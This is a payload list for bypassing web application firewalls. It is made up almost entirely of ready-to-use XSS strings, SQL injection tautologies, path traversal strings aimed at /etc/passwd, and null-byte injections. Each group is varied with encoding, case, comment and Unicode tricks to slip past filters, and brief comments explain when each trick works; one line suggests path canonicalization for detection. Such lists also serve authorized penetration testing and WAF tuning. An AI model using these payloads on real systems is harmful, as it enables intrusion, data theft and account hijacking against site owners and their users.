# WAF Bypass Payloads — encoding, obfuscation, and evasion techniques
# XSS bypasses — URL encoding (single-encoded, then double-encoded)
%3Cscript%3Ealert(1)%3C/script%3E
%253Cscript%253Ealert(1)%253C%252Fscript%253E
# XSS bypasses — case variation
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</sCrIpT>
# XSS bypasses — tag alternatives
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<body onload=alert(1)>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
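# XSS bypasses — template literals and encoding (backtick call, \uXXXX escapes, String.fromCharCode)
# Note: \uXXXX escapes are decoded by a JavaScript or JSON parser, not by the HTML parser.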
<script>alert`1`</script>
\u003cscript\u003ealert(1)\u003c/script\u003e
<script>alert(String.fromCharCode(88,83,83))</script>
# XSS bypasses — nested/broken tags
<scr<script>ipt>alert(1)</scr</script>ipt>
<<script>alert(1)//<</script>
# SQLi bypasses — comment injection
' OR/**/1=1--
' /*!OR*/ 1=1--
'/**/OR/**/1=1--
# SQLi bypasses — URL encoding
'%20OR%201=1--
'%09OR%091=1--
# SQLi bypasses — case variation
' oR 1=1--
' Or 1=1--
# SQLi bypasses — alternate syntax
' || 1=1--
' && 1=1--
'+(1)+(1)--
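# Path traversal bypasses — URL-encoded, double-encoded, overlong UTF-8 (%c0%af) and fullwidth solidus (%ef%bc%8f) separators
# Detection: canonicalize the path (decode, normalize, resolve) before matching, and reject invalid UTF-8 such as overlong forms.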
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8fetc/passwd
# Null byte injection
%00../../etc/passwd
test%00.jpg
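# Unicode normalization — fullwidth U+FF1C / U+FF1E fold to ASCII < > under NFKC/NFKD
# Relevant only where the application normalizes input after the filter has inspected it.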
＜script＞alert(1)＜/script＞
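# CR/LF keyword splitting (labelled "chunked encoding", but unrelated to HTTP chunked transfer encoding)
# The \r\n below is escape text; it becomes a real CR LF only if the sending tool interprets escapes.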
' O\r\nR 1=1--
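# Double encoding — only the quote is double-encoded here (%2527 -> %27 -> '); the rest is single-encoded
# Matters only when a later layer URL-decodes again after the filter has matched.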
%2527%20OR%201%3D1--
# Comment-based WAF bypass for SQL — comment sequences directly after the quote; the second entry uses a null byte (%00) instead
'--/**/OR/**/1=1--
';%00OR 1=1--
